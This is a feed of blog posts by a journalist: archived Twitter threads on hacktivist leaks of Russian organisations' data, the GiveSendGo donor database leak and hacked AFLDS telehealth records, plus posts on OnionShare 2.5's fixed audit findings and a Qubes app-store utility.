<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">So generative models dream up objects like this at the drop of a whimsical hat. Perhaps one day there will be a way to make them, so that our world is filled with such things? <a href="https://t.co/wL9xLU2IDS">pic.twitter.com/wL9xLU2IDS</a></p>— Peter Eckersley (@pde33) <a href="https://twitter.com/pde33/status/1541880345393451008?ref_src=twsrc%5Etfw">June 28, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
Twitter Thread: For first time in internet history Russia is fair game for cyber attacks, and this is what it looks like2022-04-19T00:00:00ZMicah Leeurn:uuid:02b47060-b176-33fc-959c-7a1619c60b02<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1516521193808875527">https://twitter.com/micahflee/status/1516521193808875527</a></p>
<hr>
<p>I don't think people fully appreciate just how much, after invading Ukraine, people are hacking Russia. There are multiple hacks a week and it's only increasing. For first time in internet history Russia is fair game for cyber attacks, and this is what it looks like 🧵</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 9,402 Retweets, 39.8K Likes</em></p>
<hr>
<p>Distributed Denial of Secrets has been archiving these dumps and making them torrents. DDoSecrets has been around for a few years but made a big splash in 2020, during BLM protests by publishing hacked data on hundreds of US local/federal police sites <a href="https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/">https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 628 Retweets, 4,574 Likes</em></p>
<hr>
<p>Twitter permanently banned the @DDoSecrets account then, and also took the extraordinary step of banning links to ddosecrets dot com itself. Go ahead and try tweeting that URL, it won't work. Anyway, DDoSecrets has 7 Russian datasets from March and another 20 from April (so far)</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 596 Retweets, 4,369 Likes</em></p>
<hr>
<ul>
<li>817gb from Roskomnadzor, agency that monitors and censors mass media (!)</li>
<li>79gb from Transneft, world's largest oil pipline company, state-controlled</li>
<li>15gb from Rosatom, the state nuclear energy agency and major exported of uranium</li>
<li>2.4gb from RostProekt, a construction company</li>
</ul>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 521 Retweets, 3,994 Likes</em></p>
<hr>
<ul>
<li>110gb from MashOil, manufacturer for drilling, mining, and fracking industries</li>
<li>22gb from the Central Bank of Russia</li>
<li>5.9gb from Thoriz Corp, investment firm owned by an oligarch billionaire</li>
<li>52gb from Marathon Group, another investment first owned by another oligarch</li>
</ul>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 384 Retweets, 3,297 Likes</em></p>
<hr>
<ul>
<li>15gb from the Russian Orthodox Church's charitable wing</li>
<li>65gb from Central Legal Services, mostly emails</li>
<li>483gb from Mosekspertiza, state-owned firm</li>
<li>786gb from VGTRK, state-owned broadcaster that runs dozens of TV/radio stations (!)</li>
<li>244gb from Petrofort</li>
</ul>
<p><img src="image3.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 365 Retweets, 3,153 Likes</em></p>
<hr>
<ul>
<li>145gb from Aerogas, oil and gas industry</li>
<li>35gb from Forest, logging firm</li>
<li>116gb from Tver Governor's office, appointed by Putin</li>
<li>150gb from the city of Blagoveshchensk</li>
</ul>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 302 Retweets, 2,800 Likes</em></p>
<hr>
<p>Whew... there's still a lot more. It's going to take months and years to look through all of this data. It's hard to picture how this will affect Russia going forward. It's massive.</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 380 Retweets, 3,768 Likes</em></p>
<hr>
<ul>
<li>446gb from the Ministry of Culture (!)</li>
<li>221gb from the education department of Strezhevoy</li>
<li>440gb from Technotec, oil and gas industry</li>
<li>726gb from Gazprom, oil and gas manufacturer</li>
<li>400gb from Continent Express, travel agency</li>
</ul>
<p><img src="image5.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 319 Retweets, 2,902 Likes</em></p>
<hr>
<ul>
<li>222gb from Gazregion, construction company that does gas pipelines (hacked by 3 different hacktivists at the same time lol)</li>
<li>107gb from Neocom Geoservice, oil, gas, and drilling engineering</li>
</ul>
<p><img src="image6.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 272 Retweets, 2,643 Likes</em></p>
<hr>
<ul>
<li>1.2gb from Synesis Surveillance System</li>
<li>9.5gb from General Dept of Troops and Civil Construction (works with ministry of defense)</li>
<li>160gb from Tendertech, financial and banking processing firm</li>
</ul>
<p><img src="image7.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 263 Retweets, 2,490 Likes</em></p>
<hr>
<p>Those last four datasets: those were from TODAY. I know there are several more in the DDoSecrets backlog as well. It's insane.</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 245 Retweets, 3,241 Likes</em></p>
<hr>
<p>This isn't all that DDoSecrets does at all. It's just been particularly slammed by hacktivism against Russia since the illegal invasion of Ukraine. Here's a great overview from @illegaldaydream, a member of the collective <a href="https://backdrifting.net/post/057_what_is_ddosecrets">https://backdrifting.net/post/057_what_is_ddosecrets</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 452 Retweets, 2,954 Likes</em></p>
<hr>
<p>After January 6, DDoSecrets published 5gb of hacked data from the Oath Keeper militia and shared it privately with journalists, which triggered dozens of investigations around the country <a href="https://www.npr.org/2021/11/05/1052098059/active-duty-police-in-major-u-s-cities-appear-on-purported-oath-keepers-rosters">https://www.npr.org/2021/11/05/1052098059/active-duty-police-in-major-u-s-cities-appear-on-purported-oath-keepers-rosters</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 751 Retweets, 4,409 Likes</em></p>
<hr>
<p>During the far right anti-vax Canadian "Freedom Convoy", a hacktivist hacked the far right fundraising site GiveSendGo and leaked all their data to DDoSecrets, which shared with journalists. This also triggered dozens of news articles <a href="https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/">https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 516 Retweets, 3,603 Likes</em></p>
<hr>
<p>Even since Russia's war against Ukraine started, DDoSecrets published 4TB of data from "Mining Secrets", a major collaboration of 65 journalists and 20 newsrooms <a href="https://forbiddenstories.org/case/mining-secrets/">https://forbiddenstories.org/case/mining-secrets/</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 455 Retweets, 3,000 Likes</em></p>
<hr>
<p>Anyway, I've been working on downloading as much of the hacked Russian data as I can and making it searchable for Russian-speaking journalists. If you have the time and tech skills, you should too! The data is available to everyone</p>
<p><em>Posted 1:57 PM · Apr 19, 2022, 498 Retweets, 3,395 Likes</em></p>
<hr>
<p>And if you want to support DDoSecrets, go to ddosecrets dot com and click "Donate" on the left. The collective works on a shoestring budget, doesn't get paid, and spends very little time fundraising because they're too busy with everyone hacking Russia</p>
<p><img src="image8.jpg" alt=""></p>
<p><em>Posted 1:57 PM · Apr 19, 2022, 477 Retweets, 3,024 Likes</em></p>
<hr>
<p>TODAY DDoSecrets released two new hacked Russian datasets:</p>
<ul>
<li>130gb from Worldwide Invest, investment firm</li>
<li>432gb from Sawatzky, property management firm with lots of big clients</li>
</ul>
<p><img src="image9.png" alt=""></p>
<p><em>Posted 3:18 PM · Apr 20, 2022, 79 Retweets, 532 Likes</em></p>
<hr>
<p>The section on the DDoSecrets Wikipedia page for its 2022 releases is woefully out of date, if anyone wants to improve it <a href="https://en.wikipedia.org/wiki/Distributed_Denial_of_Secrets">https://en.wikipedia.org/wiki/Distributed_Denial_of_Secrets</a></p>
<p><em>Posted 5:02 PM · Apr 20, 2022, 47 Retweets, 363 Likes</em></p>
<hr>
<p>Another release today:</p>
<ul>
<li>211gb from Accent Capital, a commercial real-estate investment firm</li>
</ul>
<p><img src="image10.png" alt=""></p>
<p><em>Posted 11:10 AM · Apr 21, 2022, 9 Retweets, 121 Likes</em></p>
<hr>
<p>I wrote an article about how hacktivists are bombarding Russia with an Unprecedented onslaught of cyberattacks <a href="https://theintercept.com/2022/04/22/russia-hackers-leaked-data-ukraine-war/">https://theintercept.com/2022/04/22/russia-hackers-leaked-data-ukraine-war/</a></p>
<p><em>Posted 1:43 PM · Apr 22, 2022, 31 Retweets, 96 Likes</em></p>
<hr>
<p>Another day, another few hundred gigs of hacked emails from a Russian company. Today DDoSecrets published 432gb of data from Enerpred, the largest producer of hydraulic tools in Russia that works in energy, petrochemical, coal, gas and construction</p>
<p><img src="image11.png" alt=""></p>
<p><em>Posted 1:50 PM · Apr 22, 2022, 6 Retweets, 59 Likes</em></p>
<hr>
<p>1.1 terabytes (!) of email from ALET / АЛЕТ, a customs broker for companies in the fuel and energy industries, handling exports and customs declarations for coal, crude oil, liquefied gases and petroleum products</p>
<p><img src="image12.png" alt=""></p>
<p><em>Posted 10:17 AM · Apr 25, 2022, 3 Retweets, 39 Likes</em></p>
<hr>
<p>More hacks in the last few days:</p>
<ul>
<li>554gb of data from Petersburg Social Commercial Bank</li>
<li>1.7tb (terabytes!) from Elektrocentromontazh, Russia's primary electricity utility</li>
</ul>
<p><img src="image13.png" alt=""></p>
<p><em>Posted 5:02 PM · Apr 29, 2022, 6 Retweets, 20 Likes</em></p>
<hr>
<p>The first hacked Russian dataset in May: 20gb of data from LLC Capital, a Russian accounting firm</p>
<p><img src="image14.png" alt=""></p>
<p><em>Posted 3:04 PM · May 4, 2022, 5 Retweets, 14 Likes</em></p>
Twitter Thread: "Freedom Convoy" and the GiveSendGo hacks2022-02-15T00:00:00ZMicah Leeurn:uuid:6cdded8d-23fe-39eb-873f-1ff8b852d11f<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1493654096078721027">https://twitter.com/micahflee/status/1493654096078721027</a></p>
<hr>
<p>Donation site used by Freedom Convoy suffers 3rd data leak in two weeks. The new hack includes "a full 2.5 GB MySQL database dump, source code for their Bitbucket repo, information from their customer service systems” and limited credit card data <a href="https://www.dailydot.com/debug/givesendgo-trucker-convoy-hack-leak/">https://www.dailydot.com/debug/givesendgo-trucker-convoy-hack-leak/</a></p>
<p><em>Posted 10:31 AM · Feb 15, 2022, 203 Retweets, 470 Likes</em></p>
<hr>
<p>I'm starting to look at the latest GiveSendGo leak. The MySQL dump, called gsg_prod_v4_20220211.sql, appears to be a complete dump of their production database. It includes the entire donor history of everyone who's donated to any campaign before February 11, last Friday</p>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 2:46 PM · Feb 15, 2022, 68 Retweets, 204 Likes</em></p>
<hr>
<p>The tbl_users table has 170,944 rows -- this is probably everyone who has made an account on GiveSendGo... and everyone's passwords are hashed with md5, though at least they're salted</p>
<p><em>Posted 2:48 PM · Feb 15, 2022, 20 Retweets, 126 Likes</em></p>
<hr>
<p>Here are the campaigns that brought in the most money.</p>
<ul>
<li>#1: Freedom Convoy 2022</li>
<li>#2: Abbichuu Gypsum Board Company (???)</li>
<li>#3: Adopt a trucker (another Freedom Convoy one)</li>
<li>#4: Voter Integrity Project</li>
<li>#5: Kyle Rittenhouse Legal Defense</li>
</ul>
<p><img src="image2.jpg" alt=""></p>
<p><em>Posted 2:58 PM · Feb 15, 2022, 59 Retweets, 152 Likes</em></p>
<hr>
<p>Here are the campaigns that have attracted most individual donors:</p>
<ul>
<li>#1: Freedom Convoy 2022</li>
<li>#2: Kyle Rittenhouse Legal Defense</li>
<li>#3: Support COVID19 Federal Whistleblower Jodi Omalley</li>
<li>#4: Facebook Whistleblower Support Fund Morgan Kahmann</li>
<li>#5: Pfizer Whistleblower Melissa</li>
</ul>
<p><img src="image3.jpg" alt=""></p>
<p><em>Posted 3:01 PM · Feb 15, 2022, 43 Retweets, 129 Likes</em></p>
<hr>
<p>This leak also contains about 3GB of images of identification docs, about 1,400 of them, I believe from people who run campaigns. Here's a random sampling</p>
<p><img src="image4a.jpg" alt="">
<img src="image4b.jpg" alt="">
<img src="image4c.png" alt="">
<img src="image4d.jpg" alt=""></p>
<p><em>Posted 3:27 PM · Feb 15, 2022, 49 Retweets, 154 Likes</em></p>
<hr>
<p>There's also a TON of Stripe data. Like, type of CC, last 4 digits, billing address, etc. This is from an interesting summary.txt from Stripe, specifically for the Freedom Convoy 2020 campaign</p>
<p><img src="image5.png" alt="">
<img src="image6.jpg" alt=""></p>
<p><em>Posted 3:34 PM · Feb 15, 2022, 28 Retweets, 114 Likes</em></p>
<hr>
<p>Oh and those unredacted (I did the redaction above) photos of gov issued IDs? The hacker included the script they used to download them all using curl, over Tor, without any authentication.</p>
<p>When @MikaelThalen told GiveSendGo about this issue they called it "fake news"</p>
<p><img src="image7.png" alt="">
<img src="image8.png" alt=""></p>
<p><em>Posted 3:51 PM · Feb 15, 2022, 36 Retweets, 181 Likes</em></p>
<hr>
<p>The death threats have started and I haven't even published my article yet</p>
<p><img src="image9.png" alt=""></p>
<p><em>Posted 3:32 PM · Feb 16, 2022, 7 Retweets, 56 Likes</em></p>
<hr>
<p>Because the GiveSendGo dataset is full of private info it isn't available to the public. DDoSecrets is only distributing it to journalists and researchers. If you'd like to request access, email info@ddosecrets.com</p>
<p><em>Posted 3:45 PM · Feb 16, 2022, 6 Retweets, 44 Likes</em></p>
<hr>
<p>Just published my first article based on the GiveSendGo dataset: Oath Keepers, anti-democracy activists, and others on the far right are funding Canada’s “Freedom Convoy” <a href="https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/">https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/</a></p>
<p><em>Posted 10:33 AM · Feb 17, 2022, 28 Retweets, 62 Likes</em></p>
OnionShare 2.5 fixes security issues and adds censorship circumvention features2022-01-17T00:00:00ZMicah Leeurn:uuid:dd84ce5b-c5a0-345f-bd1f-0dbfbd81acf3<p>The OnionShare team has just released OnionShare 2.5! This version fixes security vulnerabilities uncovered in our first comprehensive security audit, and also includes improved censorship circumvention features. Download it from <a href="https://onionshare.org">onionshare.org</a>.</p>
<h1 id="onionshare-s-first-security-audit">OnionShare's first security audit</h1><p>Late last year, the OnionShare project was lucky enough to be get a comprehensive security audit from the non-profit penetration testing group <a href="https://www.radicallyopensecurity.com/">Radically Open Security</a>. This work was funded by Open Technology Fund's <a href="https://www.opentech.fund/labs/red-team-lab/">Red Team Lab</a>.</p>
<p>Fortunately, ROS didn't find any issues with a threat level of <em>critical</em> or <em>high</em>, but they found 2 that were <em>elevated</em>, 3 that were <em>moderate</em>, and 4 that were <em>low</em>. All vulnerabilities have been fixed in version 2.5.</p>
<p>From the report:</p>
<blockquote><p>The penetration test goals were the de-anonymization of users and code execution on any of the involved parties, which was not found possible in the time allocated for the engagement. This is most likely due to the choice of offloading the client interaction and authentication fully on the Tor-browser and relying on the security assumptions of a recent and well maintained browser. Additionally, the usage of stable third party libraries for file and network handling, as well as the separation of logic and user interface exposed only a minimal attack surface. User-controlled input is minimal and in most cases sanitized or validated.</p>
<p>...</p>
<p>Our general impression is that the Onionshare project has no major security vulnerabilities and can be used within the
properly documented boundaries. Sane default configurations were chosen and inexperienced users are warned about
the consequences of sensitive configuration changes.</p>
</blockquote>
<p>Check out the <a href="https://raw.githubusercontent.com/onionshare/onionshare/develop/security/2021%20Penetration%20Test%20Report.pdf">full penetration test report</a>, which I summarize at the end of this post.</p>
<h1 id="improved-censorship-circumvention">Improved censorship circumvention</h1><p>It's becoming alarmingly more common to see hostile governments pressure internet providers to block access to the Tor network. For example, in December, several <a href="https://ooni.org/post/2021-russia-blocks-tor/">Russian ISPs started blocking Tor as well as censoring access to torproject.org</a>. Because OnionShare relies on Tor, this means that Russia is preventing people from using OnionShare as well.</p>
<p>This update greatly improves our support for <em>bridges</em>, which let people quickly and easily circumvent this sort of censorship. A bridge is a Tor server, generally with a secret IP address so it's harder to block, that just forwards traffic onto the Tor network for people. So if you live in Moscow and you can't connect to Tor because your ISP is blocking the IP addresses of public Tor nodes, you can configure OnionShare (or Tor Browser) to use a bridge. This way you'll connect to an IP address that isn't blocked, thus bypassing the censorship.</p>
<p>OnionShare has supported bridges for some time, but one of the coolest features of this release is the ability to automatically fetch bridges from the <a href="https://bridges.torproject.org/">BridgeDB service</a> directly from the settings tab.</p>
<p><img src="moat1.png" alt=""></p>
<p>When you click "Request a New Bridge", you must solve a CAPTCHA to get access to the bridge settings.</p>
<p><img src="moat2.png" alt=""></p>
<p>But if the ISP is already blocking access to the Tor network and to torproject.org, what stops them from blocking BridgeDB also? To prevent this from happening, OnionShare uses a tool called <a href="https://gitlab.torproject.org/legacy/trac/-/wikis/doc/meek/">meek</a> that uses a technique called <a href="https://www.bamsoftware.com/papers/fronting/">domain fronting</a> to disguise the request to BridgeDB as an innocuous request to a major CDN, the kind that you make thousands of times a day as you use the web. This prevents these countries from being able to block the BridgeDB request without blocking the whole CDN itself, which would break large portions of the internet for its users.</p>
<p>OnionShare has also added support for <a href="https://snowflake.torproject.org/">Snowflake bridges</a> which uses WebRTC (the technology that we all use for our all-too-frequent video conferences) to allow anyone to quickly and easily run a bridge.</p>
<p>If you want to help censored users connect to Tor, you can actually just turn on Snowflake in the sidebar of my blog. As long as this tab is open, your browser will be running a Snowflake bridge.</p>
<h1 id="summary-of-onionshare-2-4-s-security-audit">Summary of OnionShare 2.4's security audit</h1><h3 id="improper-input-sanitization-and-an-out-of-bounds-read-in-qt">Improper input sanitization and an out-of-bounds read in Qt</h3><p>If a user was running the graphical version of OnionShare and an attacker entered a malicious string containing HTML in the path of the URL, and the user running OnionShare opened the History pane (which is collapsed by default), this HTML would be rendered by Qt, the library that OnionShare uses for its GUI.</p>
<p>When the ROS pen testers discovered that they could use this to display arbitrary images in the History pane, they started attacking Qt's image rendering and <em>uncovered a vulnerability in Qt's image renderer</em>. When used in conjunction with this sanitization issue in OnionShare, an out-of-bounds read was possible, causing OnionShare to crash.</p>
<p>ROS responsibly disclosed this vulnerability to the upstream Qt project which has fixed the issues. We're really proud that our project helped make Qt more secure.</p>
<h3 id="receive-mode-s-request-limit-was-easily-dos-able">Receive mode's request limit was easily DoS-able</h3><p>Receive mode had a rate limit built in to try to prevent race conditions with folder creation during concurrent uploads. It turns out that it's pretty easy to force a denial-of-service attack by submitting the form more than 100 times per second, which would prevent authentic requests from being submitted. We solved this by using microseconds in the folder creation system, which now makes it impractical to hit the rate limit.</p>
<h3 id="chat-mode-issues">Chat mode issues</h3><p>ROS discovered that there were a variety of issues in Chat mode, most of which were closely related to one another, and so were fixed all at once. They were mostly impersonation attacks. These included:</p>
<ul>
<li>The ability to change your username to something almost identical to that of another user, like by having whitespace at the end of the username, or by using special characters</li>
<li>It was possible to join the chat but not emit the <code>join</code> event, which meant you were effectively invisible in the room, unbeknownst to the other parties, which might be a privacy issue</li>
<li>Similar to the above, it was possible to post messages to the chat room without technically being visible, or with another person's username, leading to confusion or impersonation</li>
<li>And again, similar to the above, it was possible to spoof the <code>leave</code> event, making people think you had left the chat room when in fact you were still able to read subsequent chat messages</li>
</ul>
<h3 id="minor-issues">Minor issues</h3><p>ROS also discovered a handful of minor issues, including:</p>
<ul>
<li>The Linux packaging using Snapcraft and Flatpak could be hardened prevent read-only access to the user's home folder</li>
<li>The Content Security Policy header could be disabled but not configured</li>
</ul>
<p>It's important to keep in mind that because of how OnionShare is designed, all of the vulnerabilities discovered could only be exploited if the attacker had access to the OnionShare site. It would either need to be a publicly advertised OnionShare address, or the attacker would need to intercept or be directly sent an OnionShare address and private key.</p>
<p>I want to take the opportunity to thank Radically Open Security, as well as the Open Technology Fund, for conducting such a comprehensive audit. ROS is a talented and professional organization, and it was really easy to work with them to address these issues.</p>
Qube Apps: a Flatpak-based app store for each qube2021-11-01T00:00:00ZMicah Leeurn:uuid:c01d8ab7-f6b6-3e7c-8a5b-32e363d3a4a0<p>I really like <a href="https://www.qubes-os.org/">Qubes</a> but I haven't been using it a lot lately. I have a Qubes laptop that I use for specific high security tasks, but my daily driver the last few months has been Ubuntu or <a href="https://pop.system76.com/">Pop!_OS</a> (I really like the tiling windows and the design), and sometimes macOS. Qubes is great, but it can be cumbersome to use.</p>
<p>But then I did something silly. I downloaded documents from an anonymous person on the internet that I was interested in looking at. One of them was in a strange format I wasn't familiar with, but I found an open source tool that could load the document, so I installed that and then opened it... and then it immediately crashed. Was it just a glitch, or did I just get hacked? Ugh, this is why I should be using Qubes. In Qubes, I could do this in a disposable, networkless qube so that if it did try to hack me it wouldn't have access to any of my data, or even the internet.</p>
<p>Now that I'm back on Qubes, I decided to write a little utility called <a href="https://github.com/micahflee/qube-apps">Qube Apps</a> that helps make it a little less cumbersome. It's a simple graphical wrapper around <code>flatpak</code> that lets you install, run, and update apps inside a single qube, giving you easy access to everything available in the Linux app store <a href="https://flathub.org/home">Flathub</a>, and installing it all in your private storage so you don't need to constantly fiddle with your templates.</p>
<p>Here's how it works. Each qube is based on either a Fedora or Debian template. If you have a <code>work</code> qube that's based on <code>fedora-34</code> and you want to install Slack in it, you need to first install Slack in the <code>fedora-34</code> template, and then you'll be able to run it in <code>work</code>. But this means you'll also have Slack installed in every other qube that's based on <code>fedora-34</code>, and you might not want this. What if in addition to <a href="https://flathub.org/apps/details/com.slack.Slack">Slack</a>, you also want <a href="https://flathub.org/apps/details/com.discordapp.Discord">Discord</a>, <a href="https://flathub.org/apps/details/com.visualstudio.code">Visual Studio Code</a>, <a href="https://flathub.org/apps/details/org.signal.Signal">Signal Desktop</a>, and <a href="https://flathub.org/apps/details/com.spotify.Client">Spotify</a>? Should you install all of this in your template even if you only need these apps in a single qube?</p>
<p>The answer is to install all of these as Flatpak apps, and to use <code>--user</code> when you run the <code>flatpak</code> commands which will run without root and install the software into your <code>~/.local/share/flatpak/</code> folder, which is in your qube's private storage, so it will still be there the next time you reboot it. This is also more secure than using software installed through traditional package managers like <code>dnf</code> or <code>apt</code> because Flatpak packages all run in sandboxes.</p>
<p>Let me show you an example. I already have Qube Apps installed in my <code>fedora-34</code> template, so let's make a new qube to test with:</p>
<p><img src="qube-apps1.png" alt=""></p>
<p>After creating it, I open its Qube Settings, switch to the Applications tab, and add Qube Apps to the selected applications. Then I run Qube Apps in the <code>my-new-qube</code> qube. It looks like this, because I don't have any apps from Flathub installed yet.</p>
<p><img src="qube-apps2.png" alt=""></p>
<p>When I click "Install New App" I get a simple interface to search for apps. Let's search for Signal Desktop.</p>
<p><img src="qube-apps3.png" alt=""></p>
<p>This search basically just ran <code>flatpak search signal</code> for you and displays the results. There are several results on Flathub that mention "signal" in their name or description, but the Signal Desktop one looks like it's probably the right one. If you click the Info button it will load the specific app that it's referring to on Flathub, in this case <a href="https://flathub.org/apps/details/org.signal.Signal">Signal Desktop</a>.</p>
<p>Now, I click the Install button. This opens an interactive <code>xterm</code> that asks if I'm sure I want to install it, and shows me installation progress.</p>
<p><img src="qube-apps4.png" alt=""></p>
<p>Eek, it says: "Warning: Not enough disk space to complete this operation". This is a common problem that you will almost certainly run into if you're install Flatpak apps in your qubes, but it's easy to fix. Just give the qube more disk space. I'm going to change the private storage for <code>my-new-qube</code> from 2 GB to 10 GB.</p>
<p><img src="qube-apps5.png" alt=""></p>
<p>Now that I have 10 GB of private storage, Signal Desktop finishes installing without a problem. I can run it or delete, and if I click Update Apps it will update all of the Flatpak apps I have installed to the latest versions.</p>
<p><img src="qube-apps6.png" alt=""></p>
<p>Now I'm going to install Slack, Discord, Spotify, and Visual Studio Code as well. Easy peasy.</p>
<p><img src="qube-apps7.png" alt=""></p>
<p>Hopefully Qube Apps will help you avoid installing tons of software in your templates, and help you run more of your apps in an inception of sandboxes.</p>
<p>Qube Apps is licensed GPLv3 and the code is <a href="https://github.com/micahflee/qube-apps">on github</a>. The whole thing is a python script that's less than 400 lines of code. I programmed it last night. See the <a href="https://github.com/micahflee/qube-apps/blob/main/README.md">README.md</a> for instructions on building it and installing it in your template.</p>
Twitter Thread: Healthcare network led by Simone Gold and America's Frontline Doctors making millions off hydroxychloroquine and ivermectin2021-09-28T00:00:00ZMicah Leeurn:uuid:3c48226c-b413-3ee3-801f-f4888e66172a<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1442969576719847425">https://twitter.com/micahflee/status/1442969576719847425</a></p>
<hr>
<p>A network of right-wing healthcare providers, lead by @drsimonegold and America's Frontline Doctors, is making millions of dollars off of hydroxychloroquine and ivermectin, data provided to The Intercept by an anonymous hacker reveals <a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/</a></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 2,553 Retweets, 4,284 Likes</em></p>
<hr>
<p>AFLDS, founded to promote pro-Trump doctors, has been spreading Covid misinformation since 2020. It refers its followers to its telemedicine partner SpeakWithAnMD where they pay $90 for a phone consultation</p>
<p><img src="image1a.jpg" alt="">
<img src="image1b.jpg" alt="">
<img src="image1c.jpg" alt="">
<img src="image1d.jpg" alt=""></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 216 Retweets, 663 Likes</em></p>
<hr>
<p>An "AFLDS-trained" physician calls the patient and then prescribes them hydroxychloroquine, ivermectin, or similar drugs. The drugs are then filled by the online pharmacy @Ravkoo3, which forwards the prescription to a local pharmacy to mail to the patient</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 140 Retweets, 511 Likes</em></p>
<hr>
<p>That is, assuming patients get a phone consultation at all. Many customers complained that they paid the $90 and never got a call back <a href="https://time.com/6092368/americas-frontline-doctors-covid-19-misinformation/">https://time.com/6092368/americas-frontline-doctors-covid-19-misinformation/</a></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 159 Retweets, 558 Likes</em></p>
<hr>
<p>A hacker sent me 281k patient records from Cadence Health (provides SpeakWithAnMD's tech platform) from July 16 to Sept 12.</p>
<p>72k of the AFLDS patient had consultations, so they must have paid the $90, sometimes more than once.</p>
<p>That's $6,700,000 for consultations alone!</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 158 Retweets, 583 Likes</em></p>
<hr>
<p>The hacker also sent me 340k prescription records hacked from Ravkoo, from Nov 2020 to Sept 11, 2021. The VAST majority of them are for bogus Covid drugs pushed by AFLDS. In fact, <strong>only 13%</strong> of the Rx's are for other drugs. According to pricing data, these sold for $8.5 million</p>
<p><img src="image2.jpg" alt=""></p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 155 Retweets, 469 Likes</em></p>
<hr>
<p>@drsimonegold refers to Covid-19 vaccines as "experimental biological agents", argues that Covid-19 isn't very deadly (it's killed 690k Americans so far), and that the vaccine is more dangerous than the virus itself</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 87 Retweets, 401 Likes</em></p>
<hr>
<p>"Misinformation can be really powerful to swindle people into buying products," @KolinaKoltai, who studies vaccine misinformation at @uwcip, says. "America’s Frontline Doctors are able to scale this up massively."</p>
<p><em>Posted 2:48 PM · Sep 28, 2021, 94 Retweets, 406 Likes</em></p>
<hr>
<p>Cadence Health's CEO, Roque Espinal, says he had no idea. After we spoke yesterday, he terminated service with SpeakForAnMD, and the telehealth platform is currently down.</p>
<p>"I don’t want to be associated with any crap like that. None of that quackery that’s going on," he said</p>
<p><img src="image3.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 114 Retweets, 505 Likes</em></p>
<hr>
<p>Ravkoo's CEO, Alpesh Patel, claims that they dropped AFLDS in late August because "the volume over there went up crazy, and we didn’t feel comfortable. And we don’t have that much capacity to fill that many prescriptions."</p>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 66 Retweets, 364 Likes</em></p>
<hr>
<p>Yesterday, after reaching out to the companies, SpeakWithAnMD and AFLDS had an emergency Zoom meeting full of 16 lawyers, according to Espinal. In the meeting, he told them he was terminating service, and then left</p>
<p><img src="image5.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 71 Retweets, 395 Likes</em></p>
<hr>
<p>And needless to say, the drugs AFLDS pushes are ineffective at preventing or treating Covid. If you don't want to get sick or die, get fully vaccinated and wear a mask when indoors in public</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">You are not a horse. You are not a cow. Seriously, y'all. Stop it. <a href="https://t.co/TWb75xYEY4">https://t.co/TWb75xYEY4</a></p>— U.S. FDA (@US_FDA) <a href="https://twitter.com/US_FDA/status/1429050070243192839?ref_src=twsrc%5Etfw">August 21, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 89 Retweets, 468 Likes</em></p>
<hr>
<p>AFLDS spreads Covid lies and dupes people into forking over 💵💵💵 using @drsimonegold's 340k followers on twitter, 112k on facebook, 184k on telegram, among other places.</p>
<p>Anti-vax plugs for AFLDS also show up religious email newsletters, like this one</p>
<p><img src="image6.png" alt=""></p>
<p><em>Posted 2:49 PM · Sep 28, 2021, 91 Retweets, 376 Likes</em></p>
<hr>
